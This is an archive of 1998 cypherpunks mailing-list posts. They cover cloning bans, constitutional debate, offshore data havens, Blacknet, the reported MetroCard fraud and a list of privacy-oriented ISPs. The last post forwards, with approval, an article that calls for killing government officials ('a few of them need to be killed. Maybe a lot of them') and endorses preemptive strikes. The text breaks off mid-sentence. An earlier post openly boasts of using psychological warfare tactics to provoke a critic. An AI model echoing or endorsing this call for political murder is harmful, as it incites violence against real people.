Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Tue, 13 Jan 1998 10:09:11 +0800
To: David Honig <honig@otc.net>
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <3.0.5.32.19980111002305.007ca5f0@otc.net>
Message-ID: <Pine.LNX.3.93.980113110602.238A-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 11 Jan 1998, David Honig wrote:

[...]

> At 01:28 AM 1/11/98 +1100, ? the Platypus {aka David Formosa} wrote:
> > If you have a population of unchanging clones (your typical 'master
> > race') you don't get any evoltion or improvement.
> >
> 
> A population *must* undergo variation in its
> heriditary units since 
> 1. there's always errors in copying the code
> 2. equivalently, you can't drive the error rate
> of a channel down to 0, just arbitrarily close.

This is true,  of cause if you have a population like this that will most
likely get killed off by the next pathogen.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLqxNqQK0ynCmdStAQGaXAQA2THcmQ62FS4qIfH/zhmADK58zR+uaaVG
B+pyTIB5hHiybxE9hW9jTWrzQIDsWQQ9gAh9ScOVM0xYJwCoU2gPwLNa16Yl7+2L
z7dkLoA2bt4wfDVLNxN8lDafxzWOW5Yzw4BYB3CR6/milnZaVqXhnumTblwZ0zKe
fXzYKFE0VYU=
=GLu8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 00:45:21 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
Message-ID: <199801131712.LAA27579@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 13 Jan 1998 17:02:13 +0100 (MET)
> Subject: Re: Talk of Banning Research into Human Cloning (fwd)
> From: nobody@REPLAY.COM (Anonymous)
> 
> > Spin doctor bullshit. Without the research there isn't anything to publish.
> > By banning the basic research we would in fact be banning the publishing of
> > the results of that scientific research.
> 
> This is a more significant difference than you let on: if the research is
> done abroad, it can be published here.  To the extent that one can
> theorize without experimenting, that too can be done here.  

I hope they forward the CNN piece on the European ban on cloning that is
occuring as I type this. 

The bottem line is that saying it's ok to ban it here simply because you are
sure somebody somewhere else will allow it is reprehensible and a complete
abrogation of both the spirit and the letter of the Constitution. If it's ok
to do it there, why isn't it ok to do it here? Smacks of a double standard
or some sort of surreptitious conspiracy to control the technology to the
benefit of a few. Perhaps the government has already done this research, at
Seed's estimate of $100,000 per clone, god knows they already have the money,
the equipment, and the people willing to do it.

Tell me, once the other countries have banned it will you then argue that we
should repeal our own ban and allow such research?

> > Not at all. Equating swinging of ones fist in a empty field and swinging it
> > into somebodies nose and then taking that supposition as justification to
> > ban fist swinging *is* most certainly unconstitutional. Furthermore, robbery
> 
> Congress has the power to choose whether to ban acts when the cause a harm
> (fists that connect to federal noses), or just to ban acts whether or not
> they cause harms (sending threats to government officials; broadcasting
> without a license on an unused frequency).

Bans on broadcasting without a license on an unused frequency was found
unconstitutional - it seems nobody had *ever* raised the issue before. The
interstate commerce clause was also raised and found to be potentialy
irrelevant.

Until a few years ago the threatening of anyone, even the killing of a
president, was not a federal crime. Perhaps that original idea was that
since we believe all people to be equal under the law the killing of a bum
was no more heinous than killing of a president. One could even argue that
such classifying laws as the protection of federal employees over and above
a commen citizen are in fact against the equal treatment under the law for
all citizens that this country is founded upon.

>  Like it or not, there is no
> question that most of these bans -- including the cloning ban -- are
> constitutional under the commerce and other powers, the copyrights clause
> notwithstanding. 

It's 'interstate commerce', and it isn't the copyright clause per se but the
clear and plain language regarding 'advancement'. Further the clause
*specificaly* states that it is between states - by no stretch of the honest
imagination can be be construed to include private functions inside the
state boundary. Next you will be telling me I need a federal license to
program because somebody might use my software ...

Taking away peoples rights and choices is much ruder than anything you could
claim I have ever been. Why not answer the points instead of crying about
how I hurt your feelings because I won't play within the limited set of
rules you want so that you can retain the advantages of that limited set and
as a consequence not have to deal with the possible reality that your entire
suppositional set is bogus.

> unpleasantness, and especially a complete and utter incomprehension about
> how the law in this country operates. 

I know how it operates, that is why it pisses me off. It operates under the
authority of a document that prescribes in clear language how that system is
supposed to operate and specificaly describes what those limits are, how to
apply those limits to new events, and how to change those limits if they
should be felt to be too restrictive or damaging. However, those who are
entrusted with the operation believe that that self-same trust allows them
to ignore their empowering charter.

You seem unable to comprehend that perhaps the logic that has been used to
justify many of these actions is not only unconstitutional but also in the
long term detriment of the country. It's a pitty you're so close minded you
are unable to expose your delicate sensibilities to open debate.

It's a pity that your only defence is ad hominim attacks and concious
exclusion of contrary arguments because of their emotional impact on
yourself.


Sir, the only thing I have left to say to you is:

Yet, it moves.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 00:55:23 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: 1st sign of a closed mind...
Message-ID: <199801131723.LAA27648@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



"I won't listen to that because ...."


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 01:06:07 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: What it means to be in America...
Message-ID: <199801131731.LAA27730@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




    America's abundance was created not by public sacrifices to "the
    common good," but by the productive genius of free men who pursued
    their own personal interests and the making of their own private
    fortunes. They did not starve the people to pay for America's
    industrialization. They gave the people better jobs, higher wages, and
    cheaper goods with every new machine they invented, with every
    scientific discovery or technological advance- and thus the whole
    country was moving forward and profiting, not suffering, every step of
    the way.

    - Ayn Rand
    
    
    
    In the United States the majority undertakes to supply a multitude of
    ready-made opinions for the use of individuals, who are thus relieved
    from the necessity of forming opinions of their own.

    - Alexis de Tocqueville


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 01:06:07 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: What is the Constitution?
Message-ID: <199801131732.LAA27764@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



    
    Today, when a concerted effort is made to obliterate this point, it
    cannot be repeated too often that the Constitution is a limitation on
    the government, not on private individuals- that it does not prescribe
    the conduct of private individuals, only the conduct of the
    government- that it is not a charter _for_ government power, but a
    charter of the citizen's protection _against_ the government.

    - Ayn Rand
    
    

    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Tue, 13 Jan 1998 19:45:45 +0800
To: eternity@internexus.net
Subject: (eternity) autonomous agents
Message-ID: <E0xs4ia-0006uX-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back:

> If the participant in the CPU resource market is not expected to be
> able to vet all source code he runs, this gives the would be eternity
> operator a chance to distribute his risk.

It's even better than this - your PC becomes a common carrier and you
are no longer liable :-)

If this doesn't happen, then the advocates of Java need a whole new
security infrastructure to assure users that the applets they download
aren't defamatory, pornographic, seditious or in breach of copyright!

Tim May:

> Another science fiction writer, Bruce Sterling, popularized "data havens"

At one time, Malta was thinking seriously about becoming just such a
data haven, and I expect one will appear sooner or later. After all,
what's left of the British Empire is funded by money laundering and
tax evasion - pardon me, Sir Humphrey, `offshore financial services'. 
Once the online world becomes a significant part of the global
economy, small countries that wish to achieve the high living
standards of Bermuda, Gibraltar and Jersey will be able to get there
by cashing in on `offshore data services'.

Countries like Tonga already sell domain names, but a full offshore
data service would need some way of resisting pressure from the EU and
the US government. Most of the tax havens do this by being under a
colonial umbrella. Is there an alternative? Can we create virtual
colonies in cyberspace? Can we set up a gateway to Eternity in some
country like Liberia or Somalia, which is too dangerous even for the
US Marines? Or do we have to cut a deal with Sir Humphrey?

Hiding stuff inside usenet is actually a bit like hiding behind the
skirts of Empire, isn't it? The same goes for hiding stuff on open
access web sites, or in spam. 

Given the rate at which spam is growing these days, maybe that's where
to put it. If the only way for Authority to cut mortals off from
Eternity was to pass effective laws against spam, and the only way to
stop spam was to have a global non-escrowed public key infrastructure
so that all mortals could be strongly authenticated, then ...

Ross





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 01:21:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Fed's train more technology workers? [CNN]
Message-ID: <199801131743.LAA27853@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    By MICHELLE LOCKE
>    Associated Press Writer
>    
>    BERKELEY, Calif. (AP) -- America needs more computer workers -- a lot
>    more.
>    
>    That was the message from three Cabinet officials who unveiled
>    strategies Monday for finding more technology-literate workers as the
>    U.S. economy enters the information age.
>    
>    Their proposals ranged from spending more on education and training
>    grants to putting out a new message: It's hip to be high-tech.
>    
>    "American minds really created the information age economy and
>    American minds can continue to lead it if we nurture the immense
>    talent pool here at home," said Education Secretary Richard Riley.
>    
>    Or as Deputy Labor Secretary Kathryn O'Leary Higgins said with a
>    smile, "We're from the federal government and we're here to help."

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 01:16:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: FTC ok's Intel buy of C&T [CNN]
Message-ID: <199801131744.LAA27925@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    January 13, 1998: 10:56 a.m. ET
>    
>    NEW YORK (CNNfn) - The U.S. Federal Trade Commission said Tuesday it
>    would no longer try to hold up Intel Corp.'s $420 million acquisition
>    of Chips and Technologies Inc.
>    [INLINE] The FTC did say, however, that it would continue to
>    investigate the merger as part of its more extensive look into Intel's
>    operations. Earlier, the FTC had sought a preliminary injunction to
>    halt the merger.
>    [INLINE] The FTC was apparently concerned that Intel would gain an
>    even larger market share of the chip market with the acquisition of
>    Chips and Technologies, a leading laptop computer semiconductor firm.
>    [INLINE] The FTC has been eyeing Intel carefully because it believes
>    that Intel's strong chip business, estimated to control more than 80
>    percent of the world's market, could raise antitrust concerns.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 02:19:42 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: 1 Question to Dr. Froomkin...
Message-ID: <199801131845.MAA28160@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Sir,

Do you accept that the Constitution of the United States of America is the
supreme law of the land and therefore the ultimate legal authority within
its borders?


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 13 Jan 1998 20:04:13 +0800
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] Firewalls
Message-ID: <199801131153.MAA07441@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy C. Mayonnaise's reheated, refurbished, and regurgitated 
cud is completely inappropriate for the mailing lists into which 
it is cross-ruminated.

      ,,,
 -ooO(o o)Ooo- Timmy C. Mayonnaise
      (_)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 05:25:49 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: mirroring services, web accounts for ecash
In-Reply-To: <v03102805b0e09252f52e@[207.167.93.63]>
Message-ID: <v03102801b0e189685883@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:47 AM -0800 1/13/98, Adam Shostack wrote:

>	I think that a Silk Road system, where most of the money flows
>between neighbors, might be a useful model.  Its also worth

A flaw here is that the Real Silk Road (tm) had merchants up and down the
line knowing the value of what they were buying, the rugs, silks, spices,
gold, etc.

Extending this to a long series of "encrypted" items is much more
problematic. If the "final buyer" in "Damascus" ends up with a worthless
item, does he blame the seller in "Kabul" or the seller in "Tashkent" or
the seller all the way back the line?

I don't see a "Silk Road" chain as being any improvement over the direct
broadcast offer of a conventional Blacknet system.

>considering getting the US Government to build and operate most of
>Blacknet for us as a base for sting operations, much the way Arizona
>State police distributed $7m marijuana to get $3m in seizures.  Lots
>of people got to smoke, courtesy of Uncle Sam.

Even less likely. (Though I did hear of some interest by the DoD in what
Blacknet could mean for their ability to keep secrets.)

And with full untraceability, it would hardly work for "stings." Unless
they could cause participants to trip themselves up and make mistakes,
revealing their true names. Unlikely after the first few publicized
mistakes.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 02:55:06 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: An offer to Dr. Froomkin...
Message-ID: <199801131920.NAA28285@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Sir,

I can understand your emotional reaction to some of my wording, it is its
specific intent to ellicit such a reaction. It's a measure of the readers
maturity to be able to ignore the noise and focus on the issues. However,
in this particular case this seems to be working in the negative respecting
my goals. So, in order to open channels of dicussion I would like to make an
offer. I will desist on the use of these psychological warfare techniques
and their destabalizing effects on your emotional state *if* you will
return to an open discussion without resort to ad hominim and straw man
arguments and address the issues directly and in plain language without
resort to legalistic verbal camouflage to skirt the main points.

Thank you for your time in considering this offer.

Sincerely,


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@dis.org>
Date: Wed, 14 Jan 1998 05:32:28 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801132039.PAA14695@homeport.org>
Message-ID: <Pine.BSI.3.95.980113131049.18355A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Jan 1998, Adam Shostack wrote:
> Thomas Womack wrote:
>  
> | of pairs of unfriendly nations, but I don't think (eg) the more 
> | extreme sort of kiddyporn is legal *anywhere*.
> 
> Somalia? Go places where the government is either non-existant or
> otherwise pre-occupied, and pay to drop IP in.  The locals get
> communication infrastructure as long as they leave you alone, but if
> the linux box that has the web server goes down, so do the phone
> lines.

Well as far as countries that have governments that don't really
exist there is always Liberia, But I personally would like my
own militia included with their business development package.

If I remember Black Unicorn's posts some months back about the
Seychelles, The Rene government will protect you from extradition
from any country with their military for what? $6 million?

Anguilla seems to be a doing agood job on becoming a country
willing on hosting data havens.
  
And there are likely under a hundred oil companies looking 
for firms to 'recycle' their old oil platforms and drilling
rigs wasting away around the world, I'm sure some might just
give you one just to be rid of future liability.

Cheers!

William Knowles
erehwon@dis.org


==
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston 
==
http://www.dis.org/erehwon/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 14 Jan 1998 03:53:42 +0800
To: cypherpunks@toad.com
Subject: Re: Schneier's metrocard cracked
Message-ID: <199801131927.OAA21746@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From schneier@visi.com Mon Jan 12 18:21:01 1998
   >   Subject: Re: Schneier's metrocard cracked
   >   In-Reply-To: <199801122150.NAA11668@comsec.com> from Information Security at "Jan 8, 98 11:40:23 pm"
   >   To: guy@panix.com
   >   Date: Mon, 12 Jan 1998 17:19:22 -0600 (CST)
   >   Cc: cp-lite@comsec.com
   >   
   >   Information Security wrote:
   >   >    Dr. Dim wrote:
   >   >    >   
   >   >    >   I heard on the radio that the security scheme used in New York City metrocards
   >   >    >   (designed with much input frm Bruce Schneier) has been cracked and that the
   >   >    >   "hackers" can now add fare to the cards.
   >   >    >   
   >   >    >   Does anyone know any details?  What encryption did Schneier use?
   >   > 
   >   > It sounds like a procedural thing.
   >   > 
   >   > Something like there was a way to swipe cards and have the
   >   > system wrongly think it updated the card.
   >   > 
   >   > The city announced that every cardreader in the system
   >   > is going to be recalibrated, and this will cause problems
   >   > for "a few" existing cardholders.
   >   
   >   That's not my design.  Counterpane consulted on the next generation
   >   cards, not the current mag stripe cards in the NY system.  The
   >   protocols we developed are not currently being used in any fielded
   >   system.
   >   
   >   Bruce

A subsequent news report said hackers were taking discarded
(single-use?) MetroCards and "reprogramming" them so they
would work again.

However, the description didn't sound like it was really hacking...

The MTA said only 6 fraudulent uses of this was happening per day,
and 40 of these total per day.

"Of these"?

The MTA said there was some limited tolerance for nicked or
scratched cards, and in this situation - where the software
guessed that it was a scratched card - that it was programmed
to be "lenient" and let them in.

The news report showed the MTA's new recommendation for carrying
MetroCards: sliding them into a protective container for travel.

The mag-strip cards suck.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@dis.org>
Date: Wed, 14 Jan 1998 06:47:10 +0800
To: DC-Stuff <dc-stuff@dis.org>
Subject: Privacy & Anonymous service providers?
Message-ID: <Pine.BSI.3.95.980113141956.18878A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm working on a web page that would include a list of Internet
providers that either offer anonymous accounts or a better 
degree of privacy not usually seen by regular ISP's. 

Below is a list of providers that offers these services that
I have been able to put together, I'm wondering if there are
some that I am missing.  To avoid noise on the list and I'm
no longer a member of the cypherpunks list, please e-mail me
privately.


Paranoia                            http://wwww.paranoia.com
Data Haven Project                  http://www.datahaven.com
L0pht Heavy Industries              http://www.l0pht.com
Offshore Information Services       http://www.offshore.ai
Cyberpass                           http://www.cyberpass.net
SkuzNet                             http://skuz.wanweb.net
LOD Communications                  http://www.lod.com
The Nymserver                       http://www.nymserver.com
Sekurity.org                        http://www.sekurity.org
Hotmail                             http://www.hotmail.com

Thanks in advance!

William Knowles
erehwon@dis.org


==
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston 
==
http://www.dis.org/erehwon/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 06:47:31 +0800
To: cypherpunks@Algebra.COM
Subject: And Justice For All
In-Reply-To: <v03102800b0e02a107673@[207.167.93.63]>
Message-ID: <v03102802b0e19d5005e7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Someone sent me this article, saying it sounded a bit like me. I agree.

Interesting to hear this guy calling for justice to be given to  some
government criminals.

--Tim May



At 2:24 PM -0800 1/13/98, xxxxx wrote:
>This guy sounds a little like you when you're in your best form.
>
>xxxxx
>
>>From September 1997 issue of Media Bypass - Found at
>http://www.4bypass.com/stories/line2.html
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>A Return to Accountability
>
>    By "The Guardian"
>
>
>
>    In 1994, there was the so-called "Republican Revolution." Supposedly,
>we finally got a
>    bunch of "good" politicians into office to fix things. Fat lot of good
>that did us. The
>    American people were stabbed in the back by these so called "good"
>politicians. They
>    gave us more gun-free school zones, after the Supreme Court said that
>Congress does not
>    have that authority; they gave us a National ID card law; they gave us
>the biggest seizure
>    of guns in our history through the domestic violence restrictions on
>owning guns; they gave
>    us lots of "health care crimes" that are punishable by asset
>forfeiture- by both the doctor
>    and the patient; they gave us several new national databases that will
>track very personal
>    information on virtually every American; and they gave us the specter
>of secret trials with
>    secret evidence for "certain" classes of people.
>
>    Voting is a time honored practice that allegedly allows the people to
>direct the course of
>    the government by choosing the leaders and focusing on the issues of
>importance. The
>    problem is that as a check on the government's runaway growth and
>abuses, it doesn't
>    work. James Collier wrote the book "VoteScam" to point out the massive
>voting fraud
>    that is endemic to the American electoral process. Look at the current
>scandals
>    surrounding the campaign finance issues. Where does the will of the
>people enter into this
>    process? The answer is that it doesn't.
>
>    So, shall we kick the issue of reforming government over to the
>Courts? What a joke.
>    The courts decide issues as they wish, based not upon law, but upon an
>ever changing
>    concept called "Public Policy." If they get a tough issue, they say
>it's a "political question"
>    and refuse to hear it. The right arguments can be made, but are then
>rejected as being
>    "frivolous" or "irrelevant." Critical issues are rarely decided on the
>merits; rather, they ride
>    on the crutches of manipulated "precedent."
>
>    Let the judges who have sworn an oath of office and posted their bond
>as required by
>    law come forward. The oath of office provided a contract with the
>people which in the
>    event of breach, provided the grounds to bring suit. The bond was
>forfeit if the judge
>    misbehaved. Yet these judges refuse to hold themselves to the law and
>obey. The Citizen
>    who demands that the judge present a copy of his oath of office and a
>copy of his bond is
>    ignored. Today, the citizen who tries to bring suit against a judge or
>prosecutor for
>    misconduct is sidelined by another judge- who is often as or more
>guilty than the one being
>    sued. The question is asked "Where is the justice?" There is none in
>this system.
>
>    So what are the options that are left? Should people attempt to drop
>out of the system
>    and ask to simply be left alone? They might end up like the people at
>Waco who were
>    killed over an alleged tax deficiency- the non-payment of the transfer
>tax on several
>    weapons. And all of that was simply alleged. There was no court of Law
>to hear their
>    case, and make a finding of guilt or innocence. They were murdered by
>a federal
>    government that will not bring the murderers to justice. Some say that
>the Davidians were
>    murdered as part of an experiment to find out what the American public
>was willing to
>    tolerate. The Constitution came under serious attack, and the American
>people cheered as
>    the government tanks smashed the building, pumped in poison gas, and
>then burned and
>    machine gunned the inhabitants of a separatist religious sect. Don't
>believe it? Go see the
>    movie "Waco: Rules of Engagement." Watch your government caught in the
>lie. See the
>    worms wiggle and squirm.
>
>    What about Randy Weaver? His was just another family that was trying
>to withdraw from
>    what they saw as a corrupt society. Randy buried his wife and son. His
>son, shot in the
>    back by federal marshals, was trying to return to the house. His last
>words were, "I'm
>    coming daddy." Vicky, his wife, was murdered by an FBI agent named Lon
>Horiuchi as
>    she stood in the doorway holding an infant child in her arms. Lon, who
>brags that he can
>    put his shots "on a quarter" at two hundred yards, shot her in the
>head at a distance of
>    about two hundred yards. Vicky Weaver is long buried, and Lon is still
>working for the
>    FBI as a "shooter," not seeing anything wrong with what he did.
>
>    [Editors note: Lon Horiuchi has just been indicted by the State of
>Idaho, for the
>    crime of "involuntary manslaughter." Kevin Harris, who was found not
>guilty by a
>    jury in his federal trial, is being charged with Murder in the First
>Degree. What does
>    that tell you?]
>
>    So, if the People can't vote honest and moral leaders into office, and
>there isn't any way
>    to get rid of the rotten apples- or to even get damages when they have
>done wrong, and
>    the government has demonstrated that they will take you out if you try
>to separate from the
>    society, then what options are left?
>
>    It's a hard question with an even harder answer.
>
>    Go ahead and educate the public all you want -- the public is so
>enamored with the 30
>    second sound byte that they will never pay attention long enough to
>ever present a threat
>    to the established order. The government, adhering to its global
>agenda, is rushing ahead
>    full tilt to steamroller our remaining rights. Our own Congress and
>President declared war
>    on the American People in 1932 (the infamous "Trading With The Enemy
>Act"), and they
>    have now progressed to the rape, pillage and burn phase of the war.
>Who is so foolish as
>    to claim that this is not so?
>
>    This letter is not a call to anarchy. It is a demand for
>accountability from the treasonous
>    bastards that are destroying our country. The problem is that the
>legislators, judges,
>    prosecutors, and other public officials have chosen to sidestep the
>constitutionally
>    mandated checks on their power by not swearing oaths of office or
>posting fidelity bonds.
>    They have passed laws giving themselves immunity from suits for their
>unlawful actions.
>    They have created organizations of jack-booted thugs to intimidate,
>harass, and
>    sometimes kill anyone who is willing to speak out or show any form of
>resistance. These
>    scum have set themselves outside the law, and are thus by definition,
>outlaws. Since they
>    eschew any of the legitimate means of accountability, then it looks
>like there is only one
>    way to re-instill a respect for the Constitution. We must give the
>members of government
>    more incentive to support the Constitution limitations on government
>than they have to
>    violate the Constitution.
>
>    That means that a few of them need to be killed. Maybe a lot of them.
>Perhaps when they
>    see that there is a final solution available to the people, and that
>they are not untouchable,
>    they might start acting in an accountable manner. Since our public
>servants have separated
>    themselves from all of the established forms of accountability, it is
>time to return to
>    Chairman Mao's observation: All political power emanates from the
>barrel of a gun.
>
>    You say: "That's immoral!" I respond that morality is concerned with
>right and wrong.
>    When an organized group attacks you, your family, or your community,
>then they have
>    performed what can only be described as an act of war. The response of
>any moral
>    individual is that you defend yourself and prosecute the war to the
>fullest extent possible,
>    for the purpose of winning. Preemptive strikes are just part of the
>rules of the road for this
>    task. Wars are either won or lost, and the Federal Government, along
>with the various
>    state apparatuses, is at war with the American People. Cliche as it
>sounds, they drew first
>    blood.
>
>    So if they are to be killed, it must be done for cause. Those laboring
>to bring our nation
>    back to its Republican rule of Law must not kill innocent people in
